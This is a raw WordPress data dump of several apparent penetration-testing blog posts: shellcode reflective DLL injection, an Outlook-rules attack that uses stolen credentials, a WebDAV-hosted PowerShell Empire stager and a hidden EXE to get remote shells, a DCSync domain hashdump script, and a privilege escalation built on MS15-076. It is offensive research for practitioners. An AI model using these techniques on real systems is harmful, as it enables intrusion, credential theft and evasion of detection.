  • Get your sweet RAT running in memory
  • Write DLL to perform extra functionality
  • Convert the DLL to shellcode (using sRDI) and inject locally
  • Use GetProcAddressR to lookup exported functions
  • Execute additional functionality X-times without reloading DLL

Pros: Keep your initial tool more lightweight and add functionality as needed. Load a DLL once and use it just like any other.

Use case #3 – Dependencies

  • Read existing legitimate API DLL from disk
  • Convert the DLL to shellcode (using sRDI) and load it into memory
  • Use GetProcAddress to lookup needed functions

Pros: Avoid monitoring tools that detect LoadLibrary calls. Access API functions without leaking information. (WinInet, PSApi, TlHelp32, GdiPlus)

Conclusion

We hope people get good use out of this tool. sRDI been a member of the SBS family for almost 2 years now and we have it integrated into many of our tools. Please make modifications and create pull-requests if you find improvements.

We’d love to see people start pushing memory injection to higher levels. With recent AV vendors promising more analytics and protections against techniques like this, we’re confident threat actors have already implemented improvements and alternatives that don’t involve high level languages like PowerShell or JScript.

@monoxgas

[post_title] => sRDI – Shellcode Reflective DLL Injection [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => srdi-shellcode-reflective-dll-injection [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:36:35 [post_modified_gmt] => 2021-04-27 14:36:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25106 [menu_order] => 608 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 25171 [post_author] => 77 [post_date] => 2015-12-04 12:55:00 [post_date_gmt] => 2015-12-04 12:55:00 [post_content] =>

Occasionally, we come across interesting scenarios that require thinking outside the box. For example: What if you’ve obtained a target user’s credentials (via responder.py, brute-forcing, sniffing, keylogging, etc.), but don’t have access to their workstation? This raises the question of whether a domain username and password could be useful without a workstation to authenticate against. Most organizations use Exchange for email, and make it externally accessible (via OWA or RPC over HTTPS). The AutoDiscover DNS record simplifies most of this process requiring a user to simply input his or her domain credentials into Outlook to setup the remote connection. Hopefully you can see where we’re going with this. If not, read on!

Anyone familiar enough with Outlook will know it has a “Rules and Alerts” section that allows the user to automate certain actions based on message criteria. This feature is particularly interesting because the rules sync between all Outlook installs via Exchange. Most of the available rules actions pertain to modifying the mailbox, moving messages, categorizing items, etc. However, a few more devious actions immediately stand out, namely “Start Application”.

This seems too easy! Sure enough, playing with the rule in the Outlook client highlights some pretty serious drawbacks. First, the target file needs to be locally accessible before it will save the rule. Second, it doesn’t appear to support arguments when starting the application. Poking around a bit more, we find the ability to import or export rules under the “Options” menu. Here is where we can have some fun! Let’s export a simple rule file and throw it into a hex editor.

Through the hex editor, we can find the data we’re interested in. We have the name of our rule, the text that our subject trigger is using, and the path of the file to execute. Experienced reverse engineers may notice that each text sequence is preceded by the length of the string, and the string itself is encoded with UTF-16LE. After spending some time reversing the file format, we built a python script to automate the process of modifying the rules file to execute an arbitrary malicious file instead of the one initially specified! By default, the script uses an email subject trigger rule to execute the file path specified. Like any good hacker script, it’s a little rough around the edges (e.g. no exception handling), but it’s much better than manually editing the .rwz files in a hex editor. It can be found here: https://gist.github.com/monoxgas/7fec9ec0f3ab405773fc

Note: The API Outlook uses is ShellExecute with the “open” verb when running the file, so technically any file extension with an action defined for “open” is valid. These can be found in the registry under HKEY_CLASSES_ROOT. This is also why arguments don’t work…for now. 

That’s cool, but we’re always looking for ways to weaponize techniques in real-world attack scenarios. That being said, the next challenge became finding a way to remotely leverage the capability to obtain initial access, or pivot around tough network segmentation. This is where UNC paths, SMB, and WebDAV come in handy.

  • Assuming you already had internal network access, you could host your malicious files on an open Samba share with Kali, or simply drop them on an existing public file share on the network.
  • If attempting initial access, the target network would need to allow port 445 outbound (more common than you might think), in which case you just host the file on a public server.
  • Similar to #2, but WebDAV (port 80) is used to deliver the payload.

Again, focusing on real-world attack scenarios, we opted for method #3, using an external WebDAV server running on port 80 (because everyone lets port 80 out) to deliver the payload.

Note: Performing this attack via the internet might generate a user prompt warning of execution from an untrusted location.

So let’s put all of this theory into practice and show an example attack.

The machines we’ll work with:

  • Target Workstation
    • On the internal network
    • Target user has Outlook running
  • Public Web Server
    • Internet facing server
    • Running WebDAV with Apache
    • Will deliver Powershell Empire as the payload
  • Windows VM
    • Used to connect to target user’s email account externally

Overview of the process:

  1. Install Apache and WebDAV modules. Setup a public share with anonymous access (public server)
  2. Run Empire and create listener/stager (public server)
  3. Build EXE wrapper to run PowerShell one-liner silently
  4. Build Outlook RWZ file
  5. Connect to target users email in Outlook and sync the malicious rule file (Windows VM)
  6. Send an email to trigger the Outlook rule
  7. Shellz! (target workstation)
  8. PROFIT???

Step 1 – Install Apache and WebDAV

Installing Apache and WebDAV will depend on your distro. In this demo, we used a base Ubuntu 14.04 install with a process similar to this. Here is a snippet from the 000-default.conf site config file to allow anonymous access to a WebDAV share.

In this case, I’m using “/var/www/webdav”. Just make sure proper permissions are set on that directory.

Step 2 – Setup the RAT

Powershell Empire (https://www.powershellempire.com) can be installed with a simple “git clone https://github.com/PowerShellEmpire/Empire.git”, then run “./setup/install.sh”. For this example, I just left the listener named “test” with a connecting port of 8080. Setup our one-liner using “usestager launcher <listener name>”

Step 3 – Build the payload

Alright, now that we have a RAT listener setup, with a PowerShell one-liner to deploy, and WebDAV server to host our files, we just need the file payload to deploy. This could be done a number of ways. I like to use “BAT to EXE Converter” from https://www.f2ko.de/en/b2e.php. It allows you to make a EXE for running any command line input you want. Just copy the PowerShell one-liner from Empire into a BAT file and compile it to an EXE. Don’t forget to make the application “invisible” to avoid a command prompt window popping up. Once it’s compiled, throw this EXE onto your WebDAV file share.

Step 4 – Build the rule

Using the rulz.py script mentioned earlier, create the malicious rules file.

Step 5 – Connect to Outlook

This part is the easiest of this whole process. We won’t cover this process in detail, but it should be pretty easy as most organizations have AutoDiscover via DNS setup.

Note: Although user credentials often match between domains and exchange, it is possible that they use separate passwords (especially in the case of Office 365).

Once you have the profile loaded, hop into the “Rules and Alerts” panel, hit Options, then Import.

Feel free to edit the rule after it’s imported and modify it to your pleasure. Hit Apply when you’re done and let Outlook sync the rule to Exchange.

Important: When modifying a rule that starts an application, Outlook may set “On this computer only”. Make sure to uncheck this before applying the rule!

Step 6 – Send an email

Correction, hopefully THIS is the easiest step in the process. Go ahead and shoot your target an email, either from themselves, or the address of your choosing. I like to close Outlook immediately after the message sends to make sure the local instance doesn’t interfere with the process.

Step 7 – Shellz!

This whole process can be lengthy, and a bit finicky, but nothing satisfies like popping shells using only Outlook and some credentials.

Don’t forget to clean up their Outlook rules when you are done.

What’s Next?

Like most good attacks, we aren’t really exploiting flaws, just abusing functionality to get reliable code execution. The biggest drawback right now is the inability to pass arguments when executing an application. This forces us to serve files over SMB or WebDAV which complicates the process a bit. While there are some caveats and prerequisites, Outlook rules still provide a promising entry point into a network, or around network segmentation.

[post_title] => Malicious Outlook Rules [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => malicious-outlook-rules [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:48:00 [post_modified_gmt] => 2021-04-27 14:48:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25171 [menu_order] => 656 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 25188 [post_author] => 77 [post_date] => 2015-10-02 13:05:00 [post_date_gmt] => 2015-10-02 13:05:00 [post_content] =>

Update: It was brought to our attention that we mistakenly forgot to credit a few of the researchers who contributed to the code used in this post. In fact, these contributors really did the heavy lifting and we simply combined various aspects of their work to create a hashdump script. Will Schroeder (@harmjoy), Joseph Bialek (@JosephBialek), Matt Graeber (@mattifestation), Vincent Le Toux (vincent.letoux [at] gmail.com), and Benjamin Delpy (@gentilkiwi) all contributed to this effort. Check the source for their specific contributions. We write a lot of code for internal use, and are still new at the process for public release.We apologize for the oversight!

This is a short blog post (and a script) to release a PowerShell invoker for DCSync. If you haven’t heard of “DCSync”, it is essentially a feature within Mimikatz that allows you to impersonate a domain controller to synchronize domain account credentials with other domain controllers. The underlying technology is obviously necessary so when a domain user changes his or her account password, the change gets synchronized across all domain controllers. Here’s the catch…the synchronization request doesn’t have to be made from an actual domain controller. Leveraging this “feature” in Active Directory, Mimikatz impersonates a domain controller to perform a password synchronization request to another domain controller. Add in some user enumeration and we can effectively perform a domain hashdump without ever actually being on a domain controller! Even better…on a recent assessment we found an organization had enabled the “Store passwords using reversible encryption” GPO. We were pleasantly surprised to find that DCSync not only pulled the hashes, but also the clear-text passwords for the accounts with that option enabled!

Now, there are a few noteworthy items. Of course there are some limitations to this. First (and hopefully this is obvious), you need to be a domain or enterprise administrator. Also, it may not be a good idea from an opsec perspective to run this on a non-domain controller host. Obviously, this is meant to synchronize DC to DC, not DC to workstation, or even DC to server. Sean Metcalf has a lot of good information on the opsec impact and even detection of this type of traffic here. Now on to the good stuff..

The PowerShell script leverages Invoke-ReflectivePEInjection with some help from the PowerView project to enumerate domain users. Basically, the script uses a DLL wrapper for the PowerKatz build of the Mimikatz project with an exported “powershell_reflective_mimikatz” function to execute the commands. Short synopsis:

  • Users and/or machines are enumerated from the network. (They are also passable as an argument.)
  • The DLL is loaded into memory, and the DCSync function location is found.
  • The DCSync command is generated and the function is called iteratively.
  • The output is parsed and formatted for your viewing and cracking pleasure.

Link to the ps1: https://gist.github.com/monoxgas/9d238accd969550136db

Here is the the full help for the command:

NAME
    Invoke-DCSync

SYNOPSIS
    Uses dcsync from mimikatz to collect NTLM hashes from the domain.

SYNTAX
    Invoke-DCSync [[-Users] <Array[]>] [-GetComputers] [-OnlyActive] [-PWDumpFormat] [-AllData] []

DESCRIPTION
    Uses a mimikatz dll in memory to call dcsync against a domain. By default, it will enumerate all active domain users along with the krbtgt, and print out their current NTLM hash. Big ups to @harmj0y for the powerview project. The Get-NetUser and Get-NetComputer code is ripped for this script.

PARAMETERS
    -Users <Array[]>
        Optional, An array of usernames to query hashes for (Passable on the Pipeline). krbtgt will automatically get added

        Required?                    false
        Position?                    1
        Default value
        Accept pipeline input?       true (ByValue)
        Accept wildcard characters?

    -GetComputers []
        Will pull the machine hashes as well. Default is false

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -OnlyActive []
        Will only pull users whos account is active on the domain. Default is true

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -PWDumpFormat []
        Formats the output in 'user:id:lm:ntlm:::' format. Default is false

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    -AllData []
        Prints out raw mimikatz output. Default is false

        Required?                    false
        Position?                    named
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?

    
        This cmdlet supports the common parameters: Verbose, Debug,
        ErrorAction, ErrorVariable, WarningAction, WarningVariable,
        OutBuffer and OutVariable. For more information, type,
        "get-help about_commonparameters".

INPUTS

OUTPUTS

    -------------------------- EXAMPLE 1 --------------------------
    >Invoke-DCSync -PWDumpFormat
    Returns all active user hashes in 'user:id:lm:ntlm:::' format.


    -------------------------- EXAMPLE 2 --------------------------

    >Invoke-DCSync -OnlyActive:$false -GetComputers
    Returns all user and computer object hashes in the domain


    -------------------------- EXAMPLE 3 --------------------------

    >Get-NetGroup -GroupName "EvilPeople" | % {$_.MemberName} | Invoke-DCSync
    Returns the user hashes for account in the EvilPeople group

[post_title] => Hashdump without the DC using DCSync (because we all wanted it) [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => invoke-dcsync-because-we-all-wanted-it [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:49:25 [post_modified_gmt] => 2021-04-27 14:49:25 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25188 [menu_order] => 658 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 25193 [post_author] => 77 [post_date] => 2015-08-12 13:16:00 [post_date_gmt] => 2015-08-12 13:16:00 [post_content] =>

A few weeks ago (July 14, 2015), Microsoft had a busy patch Tuesday fixing quite a few privilege escalation vulnerabilities. Among these was a bug in DCOM/RPC which allows for an NTLM authentication challenge to be reflected back to a listening TCP socket. This issue was found by James Forshaw (@tiraniddo) with the Google Security Research team. The details of this bug and potential exploit paths are covered in his write up here. Along with this write up came a PoC that utilized NTLM reflection, IStorage objects, a Junction, and some clever path trickery to get a SYSTEM process to write a file to ‘C:\Windows\ (2)’ without the user having admin privileges. Now this isn’t particularly useful if you are attempting to leverage this vulnerability to escalate privileges. So, naturally the goal became modifying the exploit to an arbitrary file write at any location on disk.

Luckily, Forshaw has also done research into Symbolic Links and Junctions which can used to weaponize this exploit. Here is a link to his slides on the topic from SyScan’15 along with his GitHub code here.

Now the piece we want to extract from all of this is the unprivileged file level symbolic link tactic (CreateSymlink). Essentially this uses a junction in combination with a symbolic link written to the global namespace in \RPC Control\ to get a C:\Folder\FileA pointing to C:\FileB without administrative privileges. Let’s walk through what it takes to get the a file written to ‘C:\Windows\System32\Evil.dll’.

  1. Make a directory junction from ‘C:\Windows\Temp\{Random}’ to ‘C:\Users\Public\Libraries\Sym’
  2. Make another junction from ‘\??\C:\Users\Public\Libraries\Sym’ to ‘\RPC Control\’
  3. Make a symlink from ‘\RPC Control\ (2)’ to ‘\??\C:\Windows\System32\Evil.dll’
  4. The exploit will attempt to write a file to ‘C:\Windows\Temp\{Random}/’ which points to ‘C:\Windows\System32\Evil.dll’

Note that steps 2 and 3 are performed together in the CreateSymlink project.

Modifying the PoC code with the above tricks, we can now copy any file to a privileged location. We’re calling finished product ‘Trebuchet’.

You might be thinking, “So what? It’s just an arbitrary file write.” We’ll leave weaponization specifics up to the reader, but if you’re familiar with DLL hijacking, then privilege escalation shouldn’t be difficult from here. The full PoC code can be found here.

Some things to note:

  • The exploit can only be ran once every 2-3 minutes. RPC gets held up by LocalSystem.
  • The Interop DLL must be in the same directory as the exploit (for now).
  • Only limited testing on Windows 7/8.1 x64 and x86 has been performed.
  • All of the licensed code belongs to Google and/or James Forshaw, and a big thanks to him for all the material and his great research.
  • Most of this code could be cleaned up and/or simplified.
[post_title] => Exploiting MS15-076 (CVE-2015-2370) [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => exploiting-ms15-076-cve-2015-2370 [to_ping] => [pinged] => [post_modified] => 2021-04-27 14:50:35 [post_modified_gmt] => 2021-04-27 14:50:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25193 [menu_order] => 659 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) ) [post_count] => 18 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 31572 [post_author] => 53 [post_date] => 2023-09-26 09:55:19 [post_date_gmt] => 2023-09-26 14:55:19 [post_content] =>
Watch Now

AI has taken the world by storm lately. From ChatGPT to automated spear phishing techniques, the security world has already seen changes in processes, automation, and threat detection - not to mention attack techniques! The recent surge of AI opens up opportunities for both defenders and adversaries alike. What can we build? What can we automate? How can we use AI to augment security to buy time and add another layer of defense to our enterprise?

In this AI-focused solutions forum, we’ll examine how AI will continue to change the security landscape. After all - tools for one are tools for many. Just as defenders benefit from AI capabilities, adversaries have found their own uses. Threat actors have found efficiencies using AI capabilities, from writing malware to discovering vulnerable systems. Defenders must be prepared for how AI will help bolster defenses while adversaries use it to ramp up their attacks.

Watch Nick Landers, VP of Research NetSPI, join the SANS team to discuss the risks, vulnerabilities, and benefits of rapidly introducing machine learning and artificial intelligence globally at the AI & ChatGPT Solutions Forum.

[wonderplugin_video iframe="https://youtu.be/lZCgXf3IW-U" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Artificial Intelligence & ChatGPT [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => artificial-intelligence-and-chatgpt [to_ping] => [pinged] => [post_modified] => 2023-12-05 10:25:00 [post_modified_gmt] => 2023-12-05 16:25:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=31572 [menu_order] => 18 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 18 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => 0e32e2debc0739c69443ae98f318fe85 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )
Artificial Intelligence & ChatGPT
Nick Landers

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.

X